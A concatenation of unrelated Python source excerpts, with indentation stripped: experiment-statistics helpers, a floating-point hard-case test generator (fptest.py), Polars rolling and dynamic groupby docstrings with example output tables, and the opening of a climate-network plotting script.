new_exp_runs[agent][e][e_val][p][p_val][k] = result
else: # No agent parameters.
result = function_on_data(exp_runs[agent][e][e_val][k], **func_param)
if mode == 'disaggregate': # Store disaggregated.
new_exp_runs[agent][k] = result
else:
if agent_keys:
for p in agent_keys: # Traverse parameters.
for p_val in exp_runs[agent][p].keys():
func_param['agent_param'] = p
func_param['agent_val'] = p_val
result = function_on_data(exp_runs[agent][p][p_val][k], **func_param)
if mode == 'disaggregate': # Store disaggregated.
new_exp_runs[agent][p][p_val][k] = result
else:
result = function_on_data(exp_runs[agent][k], **func_param)
if mode == 'disaggregate': # Store disaggregated.
new_exp_runs[agent][k] = result
if mode == 'disaggregate': # Return disaggregated results.
return new_exp_runs
elif mode == 'aggregate': # Return aggregated results.
return result
else:
raise ValueError(f"Invalid mode: {mode} not in [disaggregate, aggregate]")
def find_min_duration(exp_runs: Dict[str, Dict[str, List[np.ndarray]]],
data_keys: Union[str, List[str]],
agent_keys: Optional[Union[str, List[str]]] = None,
env_keys: Optional[Union[str, List[str]]] = None) -> int:
"""
Returns minimum duration across all variables, all parameters (specified in data_keys
and agent_keys, respectively), and all experiments stored in exp_runs.
:param exp_runs: Nested dictionary with all data logs separated by agent, data variable and
maybe by environment and agent parameters and their values.
:param data_keys: String or list of strings with the keys of the data variables to be
processed.
:param agent_keys: Optional string or list of strings with the agent parameter keys according to
which data should be separated when being processed.
:param env_keys: Optional string or list of strings with the environment parameter keys
according to which data should be separated when being processed.
:return min_dur: Scalar value with minimum length across all experiments.
"""
min_dur = sys.maxsize # Initialise to maximum possible value.
function_on_data = min_duration_call
func_param = {'min_dur': min_dur}
min_dur = traverse_experiments(exp_runs, function_on_data, func_param, data_keys,
agent_keys, env_keys, mode='aggregate')
return min_dur
def stack_exp_runs(exp_runs: Dict[str, Dict[str, List[np.ndarray]]],
data_keys: Union[str, List[str]],
agent_keys: Optional[Union[str, List[str]]] = None,
env_keys: Optional[Union[str, List[str]]] = None):
"""
Converts data to a 2-D numpy array with one row per run, and one column per time step. The
number of columns is truncated to the minimum number of time-steps across all available
experiments.
:param exp_runs: Nested dictionary with all data logs separated by agent, data variable and
maybe by environment and agent parameters and their values.
:param data_keys: String or list of strings with the keys of the data variables to be
processed.
:param agent_keys: Optional string or list of strings with the agent parameter keys according to
which data should be separated when being processed.
:param env_keys: Optional string or list of strings with the environment parameter keys
according to which data should be separated when being processed.
:return (agent_exp_runs, min_dur)
- new_exp_runs: Nested dictionary with data stored as a single Numpy array, with one row per
experiment, and one column per time step. Number of columns is truncated to the minimum
length across all agents, all parameters and all runs.
- min_dur: Minimum length across all experiments.
"""
data_keys, agent_keys, env_keys = validate_input_params(data_keys, agent_keys, env_keys)
min_dur = find_min_duration(exp_runs, data_keys, agent_keys, env_keys)
function_on_data = stack_call
func_param = {'min_dur': min_dur}
new_exp_runs = traverse_experiments(exp_runs, function_on_data, func_param,
data_keys, agent_keys, env_keys,
mode='disaggregate')
return new_exp_runs, min_dur
def aggregate_statistics(exp_runs: Dict[str, Dict[str, List[np.ndarray]]],
data_keys: Union[str, List[str]],
agent_keys: Optional[Union[str, List[str]]] = None,
env_keys: Optional[Union[str, List[str]]] = None):
"""
Computes mean, standard deviation, and standard error of some data variables across a set of
experiments.
:param exp_runs: Nested dictionary with all data logs separated by agent, data variable and
maybe by environment and agent parameters and their values.
:param data_keys: String or list of strings with the keys of the data variables to be
processed.
:param agent_keys: Optional string or list of strings with the agent parameter keys according to
which data should be separated when being processed.
:param env_keys: Optional string or list of strings with the environment parameter keys
according to which data should be separated when being processed.
:return: new_exp_runs: New nested dictionary with same fields as exp_runs, but replacing the
Numpy array with all runs with another dictionary that contains the per time-step mean and
standard deviation across runs.
"""
data_keys, agent_keys, env_keys = validate_input_params(data_keys, agent_keys, env_keys)
function_on_data = statistics_call
func_param: Dict['str', Any] = {}
new_exp_runs = traverse_experiments(exp_runs, function_on_data, func_param,
data_keys, agent_keys, env_keys,
mode='disaggregate')
return new_exp_runs
def get_cum_sum_statistics(exp_runs: Dict[str, Dict[str, List[np.ndarray]]],
discount_factor: float,
data_keys: Union[str, List[str]],
agent_keys: Optional[Union[str, List[str]]] = None,
env_keys: Optional[Union[str, List[str]]] = None):
"""
Computes discounted cumulative sum of some data variables (typically the instantaneous cost) for
each experiment (row) in `exp_runs`.
:param exp_runs: Nested dictionary with all data logs separated by agent, data variable and
maybe by environment and agent parameters and their values.
:param discount_factor: Discount factor.
:param data_keys: String or list of strings with the keys of the data variables to be
processed.
:param agent_keys: Optional string or list of strings with the agent parameter keys according to
which data should be separated when being processed.
:param env_keys: Optional string or list of strings with the environment parameter keys
according to which data should be separated when being processed.
:return: new_exp_runs: New dictionary with same fields as exp_runs, but replacing each row with
its discounted cumulative sum.
"""
data_keys, agent_keys, env_keys = validate_input_params(data_keys, agent_keys, env_keys)
function_on_data = discounted_cum_sum_call
func_param = {"discount_factor": discount_factor}
new_exp_runs = traverse_experiments(exp_runs, function_on_data, func_param,
data_keys, agent_keys, env_keys,
mode='disaggregate')
return new_exp_runs
def get_total_sum_statistics(exp_runs: Dict[str, Dict[str, List[np.ndarray]]],
data_keys: Union[str, List[str]],
agent_keys: Optional[Union[str, List[str]]] = None,
env_keys: Optional[Union[str, List[str]]] = None):
"""
Computes the sum of some data variables (typically the instantaneous cost) for each experiment
(row) in `exp_runs`.
:param exp_runs: Nested dictionary with all data logs separated by agent, data variable and
maybe by environment and agent parameters and their values.
:param data_keys: String or list of strings with the keys of the data variables to be
processed.
:param | |
<reponame>remyoudompheng/fptest<filename>fptest.py
"""
Generate hard test cases for floating point conversion.
Requires Python 3.
"""
def main():
"""
Sample expected output:
for e2=827, e10=249, digs=14236688121214300 / mant=15907522898771511
ε' = 2**827/10**249 - digs/mant = 5.765155354479547e-32
"""
MODES = [
"parse64+", "parse64-",
"parse32+", "parse32-",
"print64+", "print64-",
"print32+", "print32-",
]
import argparse
p = argparse.ArgumentParser()
p.add_argument("MODE", choices=MODES, nargs='?')
args = p.parse_args()
arg = args.MODE
if not arg or arg == "parse64+":
# 680k values
for e2 in range(50, 1024-52):
e10 = (e2 * 78913) >> 18
find_hard_parse(e2, e10+1, mantbits=54, prec=96)
if not arg or arg == "parse64-":
# 600k values
for e2 in range(20, 1024+52):
e10 = (e2 * 78913) >> 18
if e2 == 1075:
# denormals have exponent p-1074 so midpoint have p-1075
find_hard_parse_negexp(e2, e10, mantbits=53, prec=96, denormal=True)
else:
find_hard_parse_negexp(e2, e10, mantbits=54, prec=96)
if not arg or arg == "print64+":
# 275k values
for e2 in range(30, 1024-52):
e10 = (e2 * 78913) >> 18
find_hard_print(e2, e10+1, mantbits=53, prec=96)
if not arg or arg == "print64-":
# 500k values
for e2 in range(53, 1024+52):
e10 = (e2 * 78913) >> 18
if e2 == 1075:
# denormals
e2 = 1074
find_hard_print_negexp(e2, e10, mantbits=52, prec=96, denormal=True)
else:
find_hard_print_negexp(e2, e10, mantbits=53, prec=96)
# For float32, check values where 52 bit precision is not enough.
if not arg or arg == "parse32+":
# 138 values
for e2 in range(24, 128-23):
e10 = (e2 * 78913) >> 18
find_hard_parse(e2, e10+1, mantbits=25, prec=52)
if not arg or arg == "parse32-":
# 145 values
for e2 in range(16, 128+23):
e10 = (e2 * 78913) >> 18
if e2 == 150:
# denormals have exponent p-149 (so midpoint is XXp-150)
find_hard_parse_negexp(e2, e10+1, mantbits=24, prec=52, denormal=True)
else:
find_hard_parse_negexp(e2, e10+1, mantbits=25, prec=52)
if not arg or arg == "print32+":
for e2 in range(24, 128-23):
e10 = (e2 * 78913) >> 18
find_hard_print(e2, e10+1, mantbits=24, prec=48)
if not arg or arg == "print32-":
# 500k values
for e2 in range(24, 128+23):
e10 = (e2 * 78913) >> 18
if e2 == 150:
# denormals
e2 = 149
find_hard_print_negexp(e2, e10-1, mantbits=23, prec=48, denormal=True)
else:
find_hard_print_negexp(e2, e10, mantbits=24, prec=48)
def find_hard_parse(e2, e10, mantbits=54, prec=96):
"""
Find floating point numbers which are hard to parse from decimal
representation. The same numbers will be hard to format
to their "shortest representation" because doing so requires
knowing whether a representation parses back to the original number.
e.g. find floating-point numbers with exponent 385 hard to parse.
For example: 8640368759831959p+385
The midpoint (8640368759831959 + 1/2) * 1<<385
is 68089572682806429.999999999999999e115
so it is hard to determine whethere 68089572682806430e115
should parse to 8640368759831959p385 or 8640368759831960p385.
We are looking for:
mantissa × 2**385 × 10**-116 = digits + ε
where digits < 1e16
mantissa < 2**54
mantissa is odd (mantissa of the midpoint)
that is:
2**385 / 10**116 = digits / mantissa + ε'
The typical threshold we are interested in is
ε = 10**16 / 2**63 (rounding error in 64-bit arithmetic)
or ε' = 10**16 / 2**(63+53)
which gives about (1e16)*(2**54)*ε' = 2e13 candidates.
If we focus on rounding error at 96-bit precision,
(± 1e16 / 2**(96+53)) which yields about 5000 candidates.
"""
if e2 < prec:
r1 = Rat(2**prec - 1, 10**e10 * 2**(prec-e2), bound=2**mantbits)
r2 = Rat(2**prec + 1, 10**e10 * 2**(prec-e2), bound=2**mantbits)
else:
r1 = Rat(2**e2 - 2**(e2-prec), 10**e10, bound=2**mantbits)
r2 = Rat(2**e2 + 2**(e2-prec), 10**e10, bound=2**mantbits)
#print("bounds 2**{}/10**{}: {}/{} -> {}/{}".format(
# e2, e10, n1, d1, n2, d2))
for x, y in walk(r1, r2, bound=2**mantbits):
digs, mant = x, y
# try odd multiples
if mant % 2 == 1:
m = mant
d = digs
while m.bit_length() <= mantbits:
if m.bit_length() == mantbits:
decimal = str(m << e2)
if e10 > 20:
decimal = decimal[:20-e10] + "..."
print('{:17} {:17}e+{:03} {:17}p+{} = {:>45}'.format(
m, d, e10, m, e2, decimal))
m += 2*mant
d += 2*digs
else:
#print('{:17} {:17}'.format(mant, digs))
pass
# epsilon
#epsilon = (2**e2 * mant - 10**e10 * digs) / (10**e10 * mant)
#print("epsilon =", epsilon)
def find_hard_parse_negexp(e2, e10, mantbits=54, prec=96, denormal=False):
"""
Like find_hard_parse but for negative exponents
We look for:
mantissa / 2**e2 = digits / 10**e10 + ε
10**e10 / 2**e2 = digits / mantissa + ε'
"""
if e10 < prec:
# multiply by 2**(prec-e10)
r1 = Rat(10**e10 * 2**(prec-e10) - 5**e10, 2**(e2+prec-e10), bound=2**mantbits)
r2 = Rat(10**e10 * 2**(prec-e10) + 5**e10, 2**(e2+prec-e10), bound=2**mantbits)
else:
r1 = Rat(10**e10 - (10**e10 >> prec), 2**e2, bound=2**mantbits)
r2 = Rat(10**e10 + (10**e10 >> prec), 2**e2, bound=2**mantbits)
for x, y in walk(r1, r2, bound=2**mantbits):
digs, mant = x, y
# try odd multiples
if mant % 2 == 1:
m = mant
d = digs
while m.bit_length() <= mantbits:
if denormal or m.bit_length() == mantbits:
decimal = str(m * 5**e2)
if e2 > 30:
trim = ((e2-30)*7) // 10
decimal = decimal[:-trim]
print('{:17} {:17}e-{:03d} {:17}p-{} = {:>45}...'.format(
m, d, e10, m, e2, decimal))
m += 2*mant
d += 2*digs
def find_hard_print(e2, e10, mantbits=53, prec=96):
"""
Like find_hard_parse but now we are looking for:
mantissa × 2**e2 × 10**-e10 = digits + 1/2 + ε
where ε is very small.
The fractions we are looking for are:
(2*digits+1) / (2*mantissa)
"""
BOUND = 2**(1+mantbits)
if e2 < prec:
r1 = Rat(2**prec - 1, 10**e10 * 2**(prec-e2), bound=BOUND)
r2 = Rat(2**prec + 1, 10**e10 * 2**(prec-e2), bound=BOUND)
else:
r1 = Rat(2**e2 - 2**(e2-prec), 10**e10, bound=BOUND)
r2 = Rat(2**e2 + 2**(e2-prec), 10**e10, bound=BOUND)
#print("bounds 2**{}/10**{}: {}/{} -> {}/{}".format(
# e2, e10, n1, d1, n2, d2))
for x, y in walk(r1, r2, bound=BOUND):
digs, mant = x, y
# try odd multiples
if mant & 1 == 0 and digs & 1 == 1:
m = mant
d = digs
while m.bit_length() <= mantbits+1:
if m.bit_length() == mantbits+1:
decimal = str(m << (e2-1))
if e10 > 20:
decimal = decimal[:20-e10] + "..."
print('{:17} {:17}e+{:03} {:17}p+{} = {:>45}'.format(
m // 2, d // 2, e10, m // 2, e2, decimal))
m += 2*mant
d += 2*digs
# epsilon
#epsilon = (2**e2 * mant - 10**e10 * digs) / (10**e10 * mant)
#print("epsilon =", epsilon)
def find_hard_print_negexp(e2, e10, mantbits=53, prec=96, denormal=False):
BOUND = 2**(1+mantbits)
if e10 < prec:
# multiply by 2**(prec-e10)
r1 = Rat(10**e10 * 2**(prec-e10) - 5**e10, 2**(e2+prec-e10), bound=BOUND)
r2 = Rat(10**e10 * 2**(prec-e10) + 5**e10, 2**(e2+prec-e10), bound=BOUND)
else:
r1 = Rat(10**e10 - (10**e10 >> prec), 2**e2, bound=BOUND)
r2 = Rat(10**e10 + (10**e10 >> prec), 2**e2, bound=BOUND)
for x, y in walk(r1, r2, bound=BOUND):
digs, mant = x, y
# try odd multiples
if mant & 1 == 0 and digs & 1 == 1:
m = mant
d = digs
while m.bit_length() <= mantbits+1:
if denormal or m.bit_length() == mantbits+1:
decimal = str((m//2) * 5**e2)
if e2 > 36:
trim = ((e2-30)*7) // 10
decimal = decimal[:-trim] + "..."
print('{:17} {:17}e-{:03} {:17}p-{} = {:>45}'.format(
m // 2, d // 2, e10, m // 2, e2, decimal))
m += 2*mant
d += 2*digs
def walk(r1, r2, bound):
"""
Walk enumerates fractions between r1 and r2
for a given denominator bound (the Farey sequence).
>>> list(walk(Rat(1, 4), Rat(1, 2), bound=8))
[(1, 4), (2, 7), (1, 3), (3, 8), (2, 5), (3, 7), (1, 2)]
In this example, the tree is:
___ 1/3 (0,3) ____
1/4 (0, 4) ´ ` 2/5 (0,2,2)
` 2/7 (0,3,2) 3/8 (0,2,1,2)´ ` 3/7 (0,2,3)
>>> list(walk(Rat(1, 4), Rat(1, 3), bound=12))
[(1, 4), (3, 11), (2, 7), (3, 10), (1, 3)]
>>> list(walk(Rat(1, 4), Rat(2, 7), bound=32))
[(1, 4), (8, 31), (7, 27), (6, 23), (5, 19), (4, 15), (7, 26), (3, 11), (8, 29), (5, 18), (7, 25), (9, 32), (2, 7)]
>>> len(list(walk(Rat(65352703432539, 79006570561214),
... Rat(34807131698651, 42079240217226), bound=2**48)))
39930
"""
# FIXME: a couple of duplicates seem to appear
l = r1.clone()
yield l.fraction()
while l.fraction() != r2.fraction():
l = l.next(bound)
yield l.fraction()
class Rat:
def __init__(self, num, den, bound=None):
"""
Computes a continued fraction | |
of {Int32, Int64}. Note that
Int32 gets temporarily cast to Int64, so if performance matters use an Int64 column.
period
length of the window
offset
offset of the window. Default is -period
closed
Defines if the window interval is closed or not.
Any of {"left", "right", "both" "none"}
by
Also group by this column/these columns
Examples
--------
>>> dates = [
... "2020-01-01 13:45:48",
... "2020-01-01 16:42:13",
... "2020-01-01 16:45:09",
... "2020-01-02 18:12:48",
... "2020-01-03 19:45:32",
... "2020-01-08 23:16:43",
... ]
>>> df = pl.DataFrame({"dt": dates, "a": [3, 7, 5, 9, 2, 1]}).with_column(
... pl.col("dt").str.strptime(pl.Datetime)
... )
>>> out = df.groupby_rolling(index_column="dt", period="2d").agg(
... [
... pl.sum("a").alias("sum_a"),
... pl.min("a").alias("min_a"),
... pl.max("a").alias("max_a"),
... ]
... )
>>> assert out["sum_a"].to_list() == [3, 10, 15, 24, 11, 1]
>>> assert out["max_a"].to_list() == [3, 7, 7, 9, 9, 1]
>>> assert out["min_a"].to_list() == [3, 3, 3, 3, 2, 1]
>>> out
shape: (6, 4)
┌─────────────────────┬───────┬───────┬───────┐
│ dt ┆ a_sum ┆ a_max ┆ a_min │
│ --- ┆ --- ┆ --- ┆ --- │
│ datetime[ms] ┆ i64 ┆ i64 ┆ i64 │
╞═════════════════════╪═══════╪═══════╪═══════╡
│ 2020-01-01 13:45:48 ┆ 3 ┆ 3 ┆ 3 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┤
│ 2020-01-01 16:42:13 ┆ 10 ┆ 7 ┆ 3 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┤
│ 2020-01-01 16:45:09 ┆ 15 ┆ 7 ┆ 3 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┤
│ 2020-01-02 18:12:48 ┆ 24 ┆ 9 ┆ 3 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┤
│ 2020-01-03 19:45:32 ┆ 11 ┆ 9 ┆ 2 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┤
│ 2020-01-08 23:16:43 ┆ 1 ┆ 1 ┆ 1 │
└─────────────────────┴───────┴───────┴───────┘
"""
return RollingGroupBy(self, index_column, period, offset, closed, by)
def groupby_dynamic(
self,
index_column: str,
every: str,
period: Optional[str] = None,
offset: Optional[str] = None,
truncate: bool = True,
include_boundaries: bool = False,
closed: str = "right",
by: Optional[Union[str, List[str], "pli.Expr", List["pli.Expr"]]] = None,
) -> "DynamicGroupBy":
"""
Groups based on a time value (or index value of type Int32, Int64). Time windows are calculated and rows are assigned to windows.
Different from a normal groupby is that a row can be member of multiple groups. The time/index window could
be seen as a rolling window, with a window size determined by dates/times/values instead of slots in the DataFrame.
A window is defined by:
- every: interval of the window
- period: length of the window
- offset: offset of the window
The `every`, `period` and `offset` arguments are created with
the following string language:
- 1ns (1 nanosecond)
- 1us (1 microsecond)
- 1ms (1 millisecond)
- 1s (1 second)
- 1m (1 minute)
- 1h (1 hour)
- 1d (1 day)
- 1w (1 week)
- 1mo (1 calendar month)
- 1y (1 calendar year)
- 1i (1 index count)
Or combine them:
"3d12h4m25s" # 3 days, 12 hours, 4 minutes, and 25 seconds
In case of a groupby_dynamic on an integer column, the windows are defined by:
- "1i" # length 1
- "10i" # length 10
Parameters
----------
index_column
Column used to group based on the time window.
Often to type Date/Datetime
This column must be sorted in ascending order. If not the output will not make sense.
In case of a dynamic groupby on indices, dtype needs to be one of {Int32, Int64}. Note that
Int32 gets temporarily cast to Int64, so if performance matters use an Int64 column.
every
interval of the window
period
length of the window, if None it is equal to 'every'
offset
offset of the window if None and period is None it will be equal to negative `every`
truncate
truncate the time value to the window lower bound
include_boundaries
add the lower and upper bound of the window to the "_lower_bound" and "_upper_bound" columns.
this will impact performance because it's harder to parallelize
closed
Defines if the window interval is closed or not.
Any of {"left", "right", "both" "none"}
by
Also group by this column/these columns
Examples
--------
>>> from datetime import datetime
>>> # create an example dataframe
>>> df = pl.DataFrame(
... {
... "time": pl.date_range(
... low=datetime(2021, 12, 16),
... high=datetime(2021, 12, 16, 3),
... interval="30m",
... ),
... "n": range(7),
... }
... )
>>> df
shape: (7, 2)
┌─────────────────────┬─────┐
│ time ┆ n │
│ --- ┆ --- │
│ datetime[ns] ┆ i64 │
╞═════════════════════╪═════╡
│ 2021-12-16 00:00:00 ┆ 0 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌┤
│ 2021-12-16 00:30:00 ┆ 1 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌┤
│ 2021-12-16 01:00:00 ┆ 2 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌┤
│ 2021-12-16 01:30:00 ┆ 3 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌┤
│ 2021-12-16 02:00:00 ┆ 4 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌┤
│ 2021-12-16 02:30:00 ┆ 5 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌┤
│ 2021-12-16 03:00:00 ┆ 6 │
└─────────────────────┴─────┘
Group by windows of 1 hour starting at 2021-12-16 00:00:00.
>>> (
... df.groupby_dynamic("time", every="1h").agg(
... [
... pl.col("time").min().alias("time_min"),
... pl.col("time").max().alias("time_max"),
... ]
... )
... )
shape: (3, 3)
┌─────────────────────┬─────────────────────┬─────────────────────┐
│ time ┆ time_min ┆ time_max │
│ --- ┆ --- ┆ --- │
│ datetime[ns] ┆ datetime[ns] ┆ datetime[ns] │
╞═════════════════════╪═════════════════════╪═════════════════════╡
│ 2021-12-16 00:00:00 ┆ 2021-12-16 00:30:00 ┆ 2021-12-16 01:00:00 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ 2021-12-16 01:00:00 ┆ 2021-12-16 01:30:00 ┆ 2021-12-16 02:00:00 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ 2021-12-16 02:00:00 ┆ 2021-12-16 02:30:00 ┆ 2021-12-16 03:00:00 │
└─────────────────────┴─────────────────────┴─────────────────────┘
The window boundaries can also be added to the aggregation result
>>> (
... df.groupby_dynamic("time", every="1h", include_boundaries=True).agg(
... [pl.col("time").count().alias("time_count")]
... )
... )
shape: (3, 4)
┌─────────────────────┬─────────────────────┬─────────────────────┬────────────┐
│ _lower_boundary ┆ _upper_boundary ┆ time ┆ time_count │
│ --- ┆ --- ┆ --- ┆ --- │
│ datetime[ns] ┆ datetime[ns] ┆ datetime[ns] ┆ u32 │
╞═════════════════════╪═════════════════════╪═════════════════════╪════════════╡
│ 2021-12-16 00:00:00 ┆ 2021-12-16 01:00:00 ┆ 2021-12-16 00:00:00 ┆ 2 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌┤
│ 2021-12-16 01:00:00 ┆ 2021-12-16 02:00:00 ┆ 2021-12-16 01:00:00 ┆ 2 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌┤
│ 2021-12-16 02:00:00 ┆ 2021-12-16 03:00:00 ┆ 2021-12-16 02:00:00 ┆ 2 │
└─────────────────────┴─────────────────────┴─────────────────────┴────────────┘
When closed="left", should not include right end of interval [lower_bound, upper_bound)
>>> (
... df.groupby_dynamic("time", every="1h", closed="left").agg(
... [
... pl.col("time").count().alias("time_count"),
... pl.col("time").list().alias("time_agg_list"),
... ]
... )
... )
shape: (4, 3)
┌─────────────────────┬────────────┬─────────────────────────────────────┐
│ time ┆ time_count ┆ time_agg_list │
│ --- ┆ --- ┆ --- │
│ datetime[ns] ┆ u32 ┆ list [datetime[ns]] │
╞═════════════════════╪════════════╪═════════════════════════════════════╡
│ 2021-12-16 00:00:00 ┆ 2 ┆ [2021-12-16 00:00:00, 2021-12-16... │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ 2021-12-16 01:00:00 ┆ 2 ┆ [2021-12-16 01:00:00, 2021-12-16... │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ 2021-12-16 02:00:00 ┆ 2 ┆ [2021-12-16 02:00:00, 2021-12-16... │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ 2021-12-16 03:00:00 ┆ 1 ┆ [2021-12-16 03:00:00] │
└─────────────────────┴────────────┴─────────────────────────────────────┘
When closed="both" the time values at the window boundaries belong to 2 groups.
>>> (
... df.groupby_dynamic("time", every="1h", closed="both").agg(
... [pl.col("time").count().alias("time_count")]
... )
... )
shape: (4, 2)
┌─────────────────────┬────────────┐
│ time ┆ time_count │
│ --- ┆ --- │
│ datetime[ns] ┆ u32 │
╞═════════════════════╪════════════╡
│ 2021-12-16 00:00:00 ┆ 3 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌┤
│ 2021-12-16 01:00:00 ┆ 3 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌┤
│ 2021-12-16 02:00:00 ┆ 3 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌┤
│ 2021-12-16 03:00:00 ┆ 1 │
└─────────────────────┴────────────┘
Dynamic groupbys can also be combined with grouping on normal keys
>>> df = pl.DataFrame(
... {
... "time": pl.date_range(
... low=datetime(2021, 12, 16),
... high=datetime(2021, 12, 16, 3),
... interval="30m",
... ),
... "groups": ["a", "a", "a", "b", "b", "a", "a"],
... }
... )
>>> df
shape: (7, 2)
┌─────────────────────┬────────┐
│ time ┆ groups │
│ --- ┆ --- │
│ datetime[ns] ┆ str │
╞═════════════════════╪════════╡
│ 2021-12-16 00:00:00 ┆ a │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┤
│ 2021-12-16 00:30:00 ┆ a │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┤
│ 2021-12-16 01:00:00 ┆ a │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┤
│ 2021-12-16 01:30:00 ┆ b │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┤
│ 2021-12-16 02:00:00 ┆ b │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┤
│ 2021-12-16 02:30:00 ┆ a │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┤
│ 2021-12-16 03:00:00 ┆ a │
└─────────────────────┴────────┘
>>> (
... df.groupby_dynamic(
... "time",
... every="1h",
... closed="both",
... by="groups",
... include_boundaries=True,
... ).agg([pl.col("time").count().alias("time_count")])
... )
shape: (6, 5)
┌────────┬─────────────────────┬─────────────────────┬─────────────────────┬────────────┐
│ groups ┆ _lower_boundary ┆ _upper_boundary ┆ time ┆ time_count │
│ --- ┆ --- ┆ --- ┆ --- ┆ --- │
│ str ┆ datetime[ns] ┆ datetime[ns] ┆ datetime[ns] ┆ u32 │
╞════════╪═════════════════════╪═════════════════════╪═════════════════════╪════════════╡
│ a ┆ 2021-12-16 00:00:00 ┆ 2021-12-16 01:00:00 ┆ 2021-12-16 00:00:00 ┆ 3 | |
"""
Reproducing figures of the paper.
"""
# %%
import copy
import os
import argparse
import numpy as np
import xarray as xr
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from mpl_toolkits.axes_grid1 import make_axes_locatable
import seaborn as sn
import cartopy.crs as ccrs
from importlib import reload
from climnet.dataset import AnomalyDataset
from climnet.network import clim_networkx
import climnet.plots as cplt
import climnet.utils.spatial_utils as sputils
import utils as ut
PATH = os.path.dirname(os.path.abspath(__file__))
# plt.style.use('paperplot.mplstyle')
def make_argparser():
"""Set parameters for function"""
parser = argparse.ArgumentParser()
parser.add_argument("-data", "--dataset", default=None, type=str,
help=("Path to t2m dataset file regridded on equidistant grid."))
parser.add_argument("-ep", "--epNetwork", default=None, type=str,
help=("Filepath of EP network .graphml."))
parser.add_argument("-cp", "--cpNetwork", default=None, type=str,
help=("Filepath of CP network .graphml."))
parser.add_argument("-normal", "--normalNetwork", default=None, type=str,
help=("Filepath of normal network .graphml."))
return parser
# True to run with ipython
if False:
class Args():
"""Workaround of argsparser."""
def __init__(self) -> None:
self.dataset = PATH + "/../data/t2m_fekete_grid_2.5_1950-2020.nc"
self.epNetwork = PATH + \
